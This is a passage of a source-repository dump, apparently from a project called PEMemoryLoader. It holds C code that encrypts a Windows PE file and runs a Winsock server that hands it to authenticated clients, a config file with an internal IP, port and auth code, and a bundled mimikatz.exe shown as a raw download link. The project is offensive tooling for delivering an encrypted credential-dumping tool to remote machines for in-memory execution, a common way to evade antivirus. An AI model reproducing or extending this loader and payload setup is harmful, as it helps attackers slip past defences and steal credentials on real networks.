133 |     fp = fopen(encryptBin, "wb");
134 |     fwrite(PEBuffer, PELength, 1, fp);
135 |     fclose(fp);
136 |     printf("\n");
137 | }
138 | 
139 | void startServer(int port) {
140 |     WORD socket_version = MAKEWORD(2, 2);
141 |     WSADATA wsadata;
142 |     if (WSAStartup(socket_version, &wsadata) != 0) {
143 |         printf("[Error] WSAStartup:%d\n", GetLastError());
144 |         exit(0);
145 |     }
146 | 
147 |     sockfdServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
148 |     if (sockfdServer == INVALID_SOCKET) {
149 |         printf("[Error] socket:%d\n", GetLastError());
150 |         exit(0);
151 |     }
152 |     s_sin.sin_family = AF_INET;
153 |     s_sin.sin_port = htons(port);
154 |     s_sin.sin_addr.S_un.S_addr = INADDR_ANY;
155 |     if (bind(sockfdServer, (LPSOCKADDR)&s_sin, sizeof(s_sin)) == SOCKET_ERROR)
156 |     {
157 |         printf("[Error] socket-bind:%d\n", GetLastError());
158 |     }
159 |     if (listen(sockfdServer, 5) == SOCKET_ERROR)
160 |     {
161 |         printf("[Error] socket-listen:%d\n", GetLastError());
162 |         exit(0);
163 |     }
164 | 
165 |     printf("[*] Successfully listening on %d ...\n\n", port);
166 | 
167 |     while (1) {
168 |         SOCKET sockfdClient;
169 |         struct sockaddr_in cSin;
170 |         int csinLen;
171 |         csinLen = sizeof(cSin);
172 |         sockfdClient = accept(sockfdServer, (SOCKADDR*)&cSin, &csinLen);
173 |         if (sockfdClient == INVALID_SOCKET) {
174 |             printf("[Error] accept error\n");
175 |             continue;
176 |         }
177 |         else {
178 |             if (clientNum + 1 > MAX_CONNNUM) {
179 |                 send(sockfdClient, "overload\n", strlen("overload\n"), 0);
180 |                 printf("[Error] Matched the maximum connection number.<%s:%d>\n", inet_ntoa(cSin.sin_addr), cSin.sin_port);
181 |                 Sleep(1000);
182 |                 closesocket(sockfdClient);
183 |                 continue;
184 |             }
185 |             else {
186 |                 int j = 0;
187 |                 for (j = 0; j < MAX_CONNNUM; j++) {
188 |                     if (clients[j].isRunning == 0) {
189 |                         clients[j].isRunning = 1;
190 |                         clients[j].socketClient = sockfdClient;
191 |                         clients[j].cSin;
192 |                         memcpy(&(clients[j].cSin), &cSin, sizeof(cSin));
193 |                         if (clients[j].h) {
194 |                             CloseHandle(clients[j].h);
195 |                         }
196 |                         printf("\n[+] %s:%ld is knocking... \n", inet_ntoa(clients[j].cSin.sin_addr), clients[j].cSin.sin_port);
197 |                         clients[j].h = CreateThread(NULL, 0, eventHandle, &(clients[j]), 0, NULL);
198 |                         clientNum++;
199 |                         break;
200 |                     }
201 |                 }
202 |             }
203 |         }
204 |     }
205 |     closesocket(sockfdServer);
206 |     WSACleanup();
207 | 
208 | }
209 | 
210 | int main(int argc, char* argv[])
211 | {
212 |     int port = DEFAULT_PORT;
213 |     if (argc != 4)
214 |     {
215 |         printf("Usage: %s [port] [PEPath] [AuthCode]", strrchr(argv[0], '\\') ? strrchr(argv[0], '\\') + 1 : argv[0]);
216 |         exit(0);
217 |     }
218 |     if (strspn(argv[1], "0123456789") == strlen(argv[1])) {
219 |                 port = atoi(argv[1]);
220 |     }
221 | 
222 |     strcpy(peName, argv[2]);
223 | 
224 |     strcpy(authcode, argv[3]);
225 | 
226 |     doPEEncryptor();
227 |     startServer(port);
228 | 
229 |     return(0);
230 | }


--------------------------------------------------------------------------------
/x64/Debug/config.txt:
--------------------------------------------------------------------------------
1 | ip = 192.168.199.236
2 | port = 23398
3 | authcode = 654123


--------------------------------------------------------------------------------
/x64/Debug/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aplyc1a/PEMemoryLoader/f4f67fd80db104a6a55bbe43d523ed0442e5d8a8/x64/Debug/mimikatz.exe


--------------------------------------------------------------------------------